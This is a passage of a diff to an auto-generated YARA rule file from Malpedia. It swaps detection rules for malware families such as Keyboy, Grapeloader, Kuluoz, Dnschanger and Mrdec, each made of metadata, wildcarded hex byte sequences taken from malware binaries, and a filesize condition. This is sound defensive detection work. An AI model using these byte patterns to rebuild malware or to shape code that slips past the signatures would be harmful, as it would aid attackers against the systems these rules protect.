-		$sequence_6 = { e9???????? 8b01 ff5024 89c3 83f8ff 0f8522fbffff c7450800000000 }
-		$sequence_7 = { 8b470c 894c2410 8b00 890424 e8???????? 8b4c2410 85c0 }
-		$sequence_8 = { e8???????? 50 891c24 e8???????? 85ff 7408 893c24 }
-		$sequence_9 = { 894dcc 8d4de7 8945c4 668945d2 e8???????? 83ec08 807de700 }
+		$sequence_0 = { 8b8c2488000000 e8???????? 85c0 0f849d010000 }
+		$sequence_1 = { 8b8c2488000000 e8???????? 03442460 89842488000000 }
+		$sequence_2 = { 8b8c2488000000 8d840801fcffff 8944244c 837c244c00 }
+		$sequence_3 = { 8b8c2488000000 e8???????? 89842488000000 488b442478 }
+		$sequence_4 = { 8b8c2488000000 8d8401f33e706d 89842488000000 ba05000000 }
+		$sequence_5 = { 8b8c2488000000 e8???????? 4885c0 7529 }
+		$sequence_6 = { 8b8c2488000000 e8???????? 4883bc249000000000 741a }
+		$sequence_7 = { 8b8c2488000000 ff15???????? 85c0 7519 }
 
 	condition:
-		7 of them and filesize < 2174976
+		7 of them and filesize < 6703104
 }
-rule MALPEDIA_Win_Lightrail_Auto : FILE
+rule MALPEDIA_Elf_Nosedive_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "58541781-79c6-574d-b195-c74fbba8085e"
+		id = "0896063d-4b04-5de6-a33c-b1437bc56c3d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightrail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightrail_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nosedive"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.nosedive_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "5d9e17bc35bca0e64cb85c52ac794612dc1d7650f37d7c51842cacd140fd6d54"
+		logic_hash = "8416103e0574bbf55ec9fa82bbc72a32d4b6a677477fed1dee3caabd7071b0d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136111,34 +135818,34 @@ rule MALPEDIA_Win_Lightrail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b931ad0231 e8???????? 48894330 4885c0 0f8486000000 }
-		$sequence_1 = { 48d3c8 4533c0 33d2 33c9 ff15???????? 488d0d505b0100 eb0c }
-		$sequence_2 = { 488d152c7d0000 b914000000 e8???????? 4885c0 7452 }
-		$sequence_3 = { 0f84eb000000 4885c0 0f85e4000000 4d3bc1 0f84d1000000 8b7500 498b9cf700a10100 }
-		$sequence_4 = { 8b0c8e 4903ca 483bcf 721a 438b84168c000000 }
-		$sequence_5 = { 746d 4533c9 8d5772 4533c0 488bc8 ff93c8020000 }
-		$sequence_6 = { 442bc9 4183f90f 7779 428b8c8ef89a0000 4803ce ffe1 }
-		$sequence_7 = { f2410f1004c1 488d15d6860000 f20f1014c2 f20f1025???????? }
-		$sequence_8 = { ff9778020000 4c63f0 4983feff 0f84ef000000 }
-		$sequence_9 = { 8b542430 48891401 488d0d4ab90000 e8???????? }
+		$sequence_0 = { e9???????? 8b06 488b7c2408 4589ed 8907 428b442efc 4289442ffc }
+		$sequence_1 = { c644240800 8b7b10 31c9 488db42404010000 4989e4 ba02000000 e8???????? }
+		$sequence_2 = { ebe9 4531f6 4531ff 488b6c2410 4c397320 7630 488b4318 }
+		$sequence_3 = { e8???????? 5f b8008fffff 4158 e9???????? 4c8d05117f0f00 b974090000 }
+		$sequence_4 = { eb17 4889de 4889ef e8???????? 48895d10 48895d18 4c897520 }
+		$sequence_5 = { b93f000000 4429f9 4585c9 7527 4139ca 7d27 418d4f01 }
+		$sequence_6 = { f348ab 49837e6000 4d896e70 49895e78 751e b810000000 4983ff14 }
+		$sequence_7 = { c3 83c8ff 48397e08 7543 8b07 4c634610 2500010000 }
+		$sequence_8 = { e8???????? 8b4c243c ffc0 7516 48c7c098ffffff 6483385a 0f85e8010000 }
+		$sequence_9 = { e9???????? 48ffc0 80fa3a 7408 8a10 84d2 75f2 }
 
 	condition:
-		7 of them and filesize < 249856
+		7 of them and filesize < 3268608
 }
-rule MALPEDIA_Win_Knight_Auto : FILE
+rule MALPEDIA_Win_Keyboy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c56e315-5200-56d5-8f06-4a544e9166d5"
+		id = "fec012ed-67a0-5990-a09f-2adc6f6d01e1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.knight_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keyboy_auto.yar#L1-L216"
 		license_url = "N/A"
-		logic_hash = "5179c3d4ae4d3eb009209c68a9fa6d8609b0788178a723a29c116931afb57a36"
+		logic_hash = "9b6870fb0f7fa4f14ee6296738101c3d20a040df4ce6327954399cd55fe9250f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -136150,34 +135857,46 @@ rule MALPEDIA_Win_Knight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb7a 4889bc24a8010000 4889b424b0010000 c644243700 488b9424c8010000 488b02 ffd0 }
-		$sequence_1 = { e9???????? e8???????? 48898424d8000000 48899c2488000000 90 488d05b9951400 e8???????? }
-		$sequence_2 = { eb0a 488d3555d71700 4889c7 4c8b87c0000000 4c8b8fc8000000 0f1f4000 4d85c0 }
-		$sequence_3 = { eb1c 4889c7 488b8c24e0230000 e8???????? 488d3dcf083000 e8???????? 6690 }
-		$sequence_4 = { 4d3b6610 0f86a3010000 4881eca0000000 4889ac2498000000 488dac2498000000 48bae36f8e02db14e6c7 488954241f }
-		$sequence_5 = { 90 e8???????? e8???????? 4889c1 4889df 488d0589551f00 488b9c2400070000 }
-		$sequence_6 = { eb0c 488d3da69a4c00 e8???????? e8???????? 48891d???????? 833d????????00 7509 }
-		$sequence_7 = { ffc2 85d2 7d10 488d057e863800 31db 31c9 e8???????? }
-		$sequence_8 = { ffd1 4889842438010000 48899c2490000000 488d0517dd1700 e8???????? 488b8c2490000000 48894808 }
-		$sequence_9 = { e8???????? f20f108424f0000000 f20f108c24c0000000 0f57d2 660f2ed0 7613 f20f101d???????? }
+		$sequence_0 = { 51 ff75d8 6a00 ff75c0 }
+		$sequence_1 = { 6a00 8945f2 8d45f8 50 6a0e }
+		$sequence_2 = { 5d c3 3b0d???????? f27502 f2c3 f2e953030000 }
+		$sequence_3 = { c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 c705????????eec45abf c705????????bbee2bd1 c705????????3e20f129 }
+		$sequence_4 = { c705????????0caa6c89 c705????????a856701f c705????????597e743c c705????????0a9769e0 c705????????c4b85363 }
+		$sequence_5 = { c705????????0a9769e0 c705????????c4b85363 c705????????3abf261f c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 }
+		$sequence_6 = { 57 68cc020000 8d852cfdffff 8bf2 6a00 50 89b528fdffff }
+		$sequence_7 = { 24a0 3ca0 7518 b800080000 }
+		$sequence_8 = { 2408 f6d8 1ac0 24dd 88474e }
+		$sequence_9 = { 7207 b901000000 eb0f 3cfe 7509 }
+		$sequence_10 = { 6683f809 740a 6683f806 7404 32c9 eb02 }
+		$sequence_11 = { 7905 49 83c9f8 41 8a043e 0fbe4c8de0 3401 }
+		$sequence_12 = { 0fbe4c8de0 3401 0fbec0 0fafc8 80f185 880c3e }
+		$sequence_13 = { e8???????? 85c0 755e 83ff20 }
+		$sequence_14 = { f7d9 85db 0f44c2 23c8 }
+		$sequence_15 = { c705????????1671e665 c705????????f3106cb3 c705????????526c1ed0 c705????????5d05606c }
+		$sequence_16 = { ffd0 e9???????? bbfeffffff eb05 }
+		$sequence_17 = { 84c0 75f0 8d55ec c745ec5c417070 c745f06c655c55 }
+		$sequence_18 = { e8???????? 8b75c0 8bce 8b15???????? a3???????? e8???????? 8b15???????? }
+		$sequence_19 = { 8d46d6 99 83e23f 03c2 }
+		$sequence_20 = { ff15???????? 8bf8 c745f447646933 8d45f4 66c745f83200 50 }
+		$sequence_21 = { c745f06c655c55 8bf2 c745f470646174 66c745f86500 8a02 }
 
 	condition:
-		7 of them and filesize < 12149760
+		7 of them and filesize < 2170880
 }
-rule MALPEDIA_Win_Smanager_Auto : FILE
+rule MALPEDIA_Win_Grapeloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9094b6d5-dd8f-5044-9d10-3bb7c70d2fbb"
+		id = "eb279ded-b2c5-5f10-9bdf-71ce0cb379f9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smanager_auto.yar#L1-L227"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grapeloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grapeloader_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "e0a2b573b878cce9fd789f6f7825fb445120b343d0f7f8893519c9a9cc16ccfe"
+		logic_hash = "9956347475bad3c02131a3202e37348872c31d719ae25d5814bb41f19904ddf4"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -136189,85 +135908,71 @@ rule MALPEDIA_Win_Smanager_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7462cffffffff 7410 6a00 6a00 }
-		$sequence_1 = { 8b4608 85c0 7420 a801 }
-		$sequence_2 = { 83c602 6a22 56 e8???????? 83c408 85c0 }
-		$sequence_3 = { 740e 3d45270000 7407 3d46270000 }
-		$sequence_4 = { 51 51 ffd0 83c40c c7460800000000 }
-		$sequence_5 = { 8b7604 6a00 6a00 56 }
-		$sequence_6 = { 8b4510 85c0 7407 50 ff15???????? }
-		$sequence_7 = { 56 68???????? 6a00 6a00 ff15???????? 8bf8 897e28 }
-		$sequence_8 = { ff15???????? 32c0 e9???????? 0f1005???????? }
-		$sequence_9 = { 8b43ec 85c0 751d 41f6c040 7408 488b07 }
-		$sequence_10 = { 0000 80ed4a 0044feff ff900100008c }
-		$sequence_11 = { 0000 0c0c 0c0c 0c0c 0c0c 0c0c 0102 }
-		$sequence_12 = { 0007 b15a 0089b05a0089 b05a }
-		$sequence_13 = { 85c0 745c 448d4368 488d4c2470 33d2 }
-		$sequence_14 = { 448b842498000000 488b942490000000 488b4c2448 488d842480000000 4533c9 4889442428 895c2420 }
-		$sequence_15 = { 0008 53 4f 00ef }
-		$sequence_16 = { 4863ca 8a441918 42888401b0210200 ffc2 }
-		$sequence_17 = { 488bce e8???????? 8b07 488b8c2480000000 89442430 488d442440 448d4301 }
-		$sequence_18 = { 0003 b157 0000 0c0c }
-		$sequence_19 = { b920000000 498bd0 482bd3 488d81deffff7f 4885c0 7417 0fb7041a }
-		$sequence_20 = { 0007 b15a 00c4 b15a }
-		$sequence_21 = { 0007 b15a 0007 b15a }
-		$sequence_22 = { 0001 ce 50 0008 }
-		$sequence_23 = { 751c 4883e0fe 488d4f08 4c8b08 4d85c9 740c 41b802000000 }
+		$sequence_0 = { 88542417 48894c2408 48c7042400000000 48833c2414 731e 8a542417 }
+		$sequence_1 = { 0fbe4c2429 0fb7442410 01c8 6689442410 0fb644241b 0faf442420 89442420 }
+		$sequence_2 = { eb00 488b8580000000 4889e1 488d95c4020000 48895120 48c7c1ffffffff 488d95d0020000 }
+		$sequence_3 = { 5b c3 4883ec28 4c8d0d85b60000 33c9 4c8d0578b60000 488d1579b60000 }
+		$sequence_4 = { 4883ec38 4889542430 48894c2428 488b4c2428 48894c2420 48c7015c000000 }
+		$sequence_5 = { 03442438 89442438 0fb744243c 05876c0000 668944243c 8b442438 03442424 }
+		$sequence_6 = { 29c8 88442413 0fbf44243a 69c0be000000 668944243a 0fbf4c243a }
+		$sequence_7 = { 4889442428 f6401c01 7412 488b4c2428 c6411c00 4883c108 e8???????? }
+		$sequence_8 = { 488d8d08030000 e8???????? 488d8d38030000 e8???????? c7850003000000000000 488d8ddf020000 }
+		$sequence_9 = { eb00 488b9590010000 488b8d80010000 e8???????? 48898578010000 eb00 }
 
 	condition:
-		7 of them and filesize < 10013696
+		7 of them and filesize < 397312
 }
-rule MALPEDIA_Win_Sodamaster_Auto : FILE
+rule MALPEDIA_Win_Kuluoz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1f7db4a-f731-535e-9ec7-0f94492b7206"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sodamaster_auto.yar#L1-L121"
+		id = "e333e81d-6ddf-5afb-9076-c2e07a86e601"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kuluoz_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "fa1144cbcb2ad99084cc1ee6d93d89428028e0238c89b4c179e1b18530e08c7f"
+		logic_hash = "8a6d421ab9f7554479240c31c714fda22b910eb903ffdf797f53667a783e223f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d c3 8b04c5d4ca0010 5d c3 8bff 55 }
-		$sequence_1 = { 83c002 6685c9 75f5 8b8d14fbffff 2bc2 }
-		$sequence_2 = { 8b748104 40 6a64 8945e8 ff15???????? 3bf3 }
-		$sequence_3 = { 8bc3 c1f805 8d3c85a0330110 8bf3 83e61f c1e606 }
-		$sequence_4 = { a3???????? a1???????? c705????????ee5c0010 8935???????? a3???????? }
-		$sequence_5 = { 2bc1 8d8df0efffff 51 8bc8 e8???????? 8b35???????? 83c404 }
-		$sequence_6 = { 52 51 d1f8 50 8d9524ffffff }
-		$sequence_7 = { 85c0 743a 8b55ec 52 ff15???????? 8bf8 }
-		$sequence_8 = { 0f84d5000000 8b95e8efffff 53 8d85dcefffff 50 }
-		$sequence_9 = { ff15???????? eb10 c745da64006c00 b96c000000 66894dde }
+		$sequence_0 = { 8b4de8 83790c00 0f84e3000000 8b55e8 }
+		$sequence_1 = { 8bff 55 8bec 51 8b4508 8945fc 8b4d0c }
+		$sequence_2 = { 8b8da0fbffff 898df0fbffff 8b95a4fbffff 8995f4fbffff eb6f 8d85f8fbffff 50 }
+		$sequence_3 = { 85c0 740b 8b4df0 83c101 894df0 ebd7 8b55f0 }
+		$sequence_4 = { 8bff 55 8bec 51 56 c745fc00000000 eb09 }
+		$sequence_5 = { e8???????? 8b08 898d5cfbffff 8b5004 899560fbffff 8b4008 }
+		$sequence_6 = { 8b4508 054a050000 8b4d08 3b814a2d0000 7504 b001 eb02 }
+		$sequence_7 = { 50 e8???????? 8945f4 837df4ff 7405 8b45f4 eb4b }
+		$sequence_8 = { 0fbe5508 83fa0a 7409 0fbe4508 83f80d 7504 b001 }
+		$sequence_9 = { 8955f0 8b45f0 3b45e0 734e }
 
 	condition:
-		7 of them and filesize < 134144
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Emdivi_Auto : FILE
+rule MALPEDIA_Win_Sharpknot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef5b2254-03f0-58f4-b962-bbb2c39fe141"
+		id = "45650ffc-30fa-59dd-9298-17c525a596bf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.emdivi_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sharpknot_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "a232eb74848fdd496e4591cb6ccd862ae9760c83f1359caadd1d0bedc4ecfd7c"
+		logic_hash = "f79cb6af16b4be17278bbf2846f42541c5c87bd486108c50193c9587c9073fc1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136281,32 +135986,32 @@ rule MALPEDIA_Win_Emdivi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e304 83e203 3355f8 33fb }
-		$sequence_1 = { e8???????? ff75ec 8ad8 c0fb02 }
-		$sequence_2 = { e8???????? c3 beff010000 56 }
-		$sequence_3 = { e8???????? 0ad8 59 881f }
-		$sequence_4 = { e8???????? 99 2bf7 f7fe 8bc2 }
-		$sequence_5 = { 0f8785000000 8a45ff c0fb04 c0e002 0ad8 881f }
-		$sequence_6 = { f7fb 5b 6a07 03f8 8bc1 }
-		$sequence_7 = { e8???????? 8bd8 8bc6 59 c6432000 8d7801 }
-		$sequence_8 = { 83ec10 8bfc 8db5f4f2ffff a5 a5 a5 }
-		$sequence_9 = { 385d08 7513 53 53 6a01 53 53 }
+		$sequence_0 = { e8???????? 8d8c246c020000 c7842498050000ffffffff e8???????? 8b8c2490050000 }
+		$sequence_1 = { 8d542420 8bcf b8abaaaa2a 2bcd 52 f7e9 c1fa02 }
+		$sequence_2 = { 8bca 897c2430 c1e91f 03d1 83fa01 0f83b3000000 8bcb }
+		$sequence_3 = { e8???????? 8b8c2490050000 5f 5e 5d 33c0 5b }
+		$sequence_4 = { 8a8681f84400 2410 3c10 7508 660fb6b680f74400 }
+		$sequence_5 = { 7f08 81f90000a000 7616 6800001000 8d542414 6a01 }
+		$sequence_6 = { 51 e8???????? 89442448 89442428 8b44243c 895c2434 8954244c }
+		$sequence_7 = { 7522 8d44240c 50 e8???????? 8bf0 83c408 85f6 }
+		$sequence_8 = { f3a4 b910000000 8d7c2414 f3ab 8d442454 8d4c2410 50 }
+		$sequence_9 = { 8b520c 52 e8???????? 83c404 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Kardonloader_Auto : FILE
+rule MALPEDIA_Win_Snojan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "57227c50-5901-516a-b863-0f33adb6b519"
+		id = "9f201807-eca2-5671-8fb1-4c54ce96e5b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kardonloader_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snojan_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "bf2ff4ff4bbba7fc1d200f179fb3f5bc11f84479969b4348f603834a274497e5"
+		logic_hash = "1d25311cfd419aa863c883b495c4bbb0986a7541ebe6286749992456a12c9723"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136320,32 +136025,32 @@ rule MALPEDIA_Win_Kardonloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c0e904 8a8018314000 c0e002 0ac8 880c32 8bc2 }
-		$sequence_1 = { 663bc8 751c 8b4208 8bf0 c1ee10 6683f801 6a06 }
-		$sequence_2 = { 89450c 786a 0fb6443b01 8a9018314000 0fb6443b02 8a9818314000 }
-		$sequence_3 = { 68???????? e8???????? 8bf0 85f6 0f844a010000 }
-		$sequence_4 = { 7819 53 6800040000 8d8550f6ffff }
-		$sequence_5 = { 58 0fb7f1 663bc8 751c 8b4208 8bf0 }
-		$sequence_6 = { 84c0 ba???????? b9???????? 8d857cffffff 0f44ca }
-		$sequence_7 = { 51 8d8578fcffff 50 68???????? }
-		$sequence_8 = { 8bec 81ec1c020000 56 8b35???????? 57 6810270000 ffd6 }
-		$sequence_9 = { 83c40c 8bcf 5f c6043100 8bc6 5e }
+		$sequence_0 = { 8d442bfc c744240804000000 c7442404???????? 890424 }
+		$sequence_1 = { 81c43c900100 31c0 5b 5e 5f }
+		$sequence_2 = { 8b4dc0 6689810000986d 83c30c 81fb???????? 0f8285feffff e9???????? }
+		$sequence_3 = { 83f8ff 0f8452010000 c7442404???????? c70424???????? e8???????? 85c0 89c6 }
+		$sequence_4 = { 31db eb02 89c3 8d4301 8b14859026986d 85d2 }
+		$sequence_5 = { e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 ff15???????? 83ec0c }
+		$sequence_6 = { 85c9 0f84c3feffff e9???????? 0fb7810000986d 894dc0 89c7 }
+		$sequence_7 = { 56 53 e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 }
+		$sequence_8 = { 7421 85db 740c ff149d9026986d 83eb01 75f4 }
+		$sequence_9 = { b8???????? e8???????? 85c0 74e9 a1???????? 8b988000986d }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Domino_Auto : FILE
+rule MALPEDIA_Win_Dnschanger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10f793c1-4d4b-5de7-9702-d644c24734c3"
+		id = "0fa9e2eb-93b3-59e8-87b9-56660e0e1de0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.domino_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnschanger_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "e26eed1b473d3625fb435dacac72b22f0ae1cadfb46f5a5ee8d2f38a588ca275"
+		logic_hash = "a0798da45c8d16b6b8cbe6087cae140990ddc919bfe764b8983fff724ffd7558"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136359,32 +136064,32 @@ rule MALPEDIA_Win_Domino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41b800300000 488bd6 33c9 4c8bf6 ff15???????? }
-		$sequence_1 = { 488bd1 b940000000 ff15???????? 448b442438 }
-		$sequence_2 = { 7509 488b5b08 483b1f 75e9 }
-		$sequence_3 = { 488b4de7 ff15???????? 488b4def 33d2 ff15???????? 4c8d9c24a0000000 8bc3 }
-		$sequence_4 = { 488d942450010000 b904010000 ff15???????? 4c8d4c2440 }
-		$sequence_5 = { 7518 66c7030206 ff15???????? 894302 b806000000 e9???????? }
-		$sequence_6 = { 750f 66c7030101 b802000000 e9???????? 488d942450010000 b904010000 ff15???????? }
-		$sequence_7 = { ff15???????? 85c0 7434 488b4d7f }
-		$sequence_8 = { ff15???????? 488bf0 4885c0 7513 66c7030203 ff15???????? }
-		$sequence_9 = { ff15???????? 488bcf 894302 ff15???????? }
+		$sequence_0 = { 83c418 8d542410 8d442414 52 6806000200 6a00 50 }
+		$sequence_1 = { 8d442414 52 6806000200 6a00 50 }
+		$sequence_2 = { 6a08 32db ffd5 50 ff15???????? }
+		$sequence_3 = { 32c0 eb0b ff15???????? 85c0 }
+		$sequence_4 = { 8d442410 8b8b9c010000 50 57 51 e8???????? 83f86f }
+		$sequence_5 = { 57 e8???????? 8b2d???????? 6880020000 6a08 }
+		$sequence_6 = { 2ad1 f6da 1bd2 f7d2 23c2 }
+		$sequence_7 = { 8bf0 8d45f8 50 ff75f8 56 6a03 ff75fc }
+		$sequence_8 = { 84d2 7407 8a11 8816 46 }
+		$sequence_9 = { 8b442410 85c0 742a 83f80a 7415 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Cryptoluck_Auto : FILE
+rule MALPEDIA_Win_Mrdec_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d021de73-27cb-5bec-a5d2-3e18a59babc5"
+		id = "5cd525b0-3fcd-5de1-aa88-bd5dca592c29"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptoluck_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mrdec_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "962cd1309df7966b05578e3a6dacac6ddd19906dbb39c069d91052b1b1100225"
+		logic_hash = "c22120d79fe39ae9d27a4d21c75a9bbd9a26aee0b664e8fa2f821d0411c6aa0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136398,32 +136103,32 @@ rule MALPEDIA_Win_Cryptoluck_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837d1000 7409 c745d880720010 eb07 c745d878720010 837d1000 7409 }
-		$sequence_1 = { 83c40c 8945f4 6a00 6880000000 6a02 6a00 6a01 }
-		$sequence_2 = { 83ec20 8d45f8 50 8b4d08 51 ff15???????? 8b55fc }
-		$sequence_3 = { 51 837d1801 730f 8b4514 50 }
-		$sequence_4 = { 52 ff15???????? 898504f0ffff 680f040000 8b8504f0ffff 8d8c05e8fbffff }
-		$sequence_5 = { 8b4508 69c0100e0000 99 03c8 13f2 894de8 }
-		$sequence_6 = { f610 57 4c 2434 cd40 0234d2 2d734ce893 }
-		$sequence_7 = { 8b45c8 83c001 8945c8 8b4dc0 83e901 894dc0 ebe0 }
-		$sequence_8 = { 8b4de8 51 8b55fc 2b55f4 52 8b45f8 }
-		$sequence_9 = { ff15???????? 898540ffffff 83bd40ffffff00 7472 8b8d40ffffff 51 8b55e0 }
+		$sequence_0 = { c64446fa00 57 56 e8???????? 68???????? 56 e8???????? }
+		$sequence_1 = { 6a00 8d45cc 50 68ef000000 68???????? }
+		$sequence_2 = { 50 ff75f0 6a00 6a00 6a00 ff75e8 e8???????? }
+		$sequence_3 = { 7532 68dc050000 ff75dc 68???????? e8???????? }
+		$sequence_4 = { 6a00 6814010000 68???????? ff75d8 e8???????? 8d3550514000 }
+		$sequence_5 = { 8bec ff7508 6a40 e8???????? 0bc0 750c 68c8000000 }
+		$sequence_6 = { 81c700020000 68???????? 57 e8???????? 68???????? 57 e8???????? }
+		$sequence_7 = { 59 51 80c141 884808 ff05???????? 6a00 6a00 }
+		$sequence_8 = { 6a02 e8???????? 0bc0 0f8530010000 c745f000400000 ff75f0 }
+		$sequence_9 = { 6a00 6a00 e8???????? ff75dc e8???????? }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 44864
 }
-rule MALPEDIA_Win_Oceansalt_Auto : FILE
+rule MALPEDIA_Win_Giftedcrook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02715696-fd80-57ea-b24d-396ae324dbb5"
+		id = "fdb2b54b-eafe-53d8-b9a6-9bb6fa7e1261"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oceansalt_auto.yar#L1-L171"
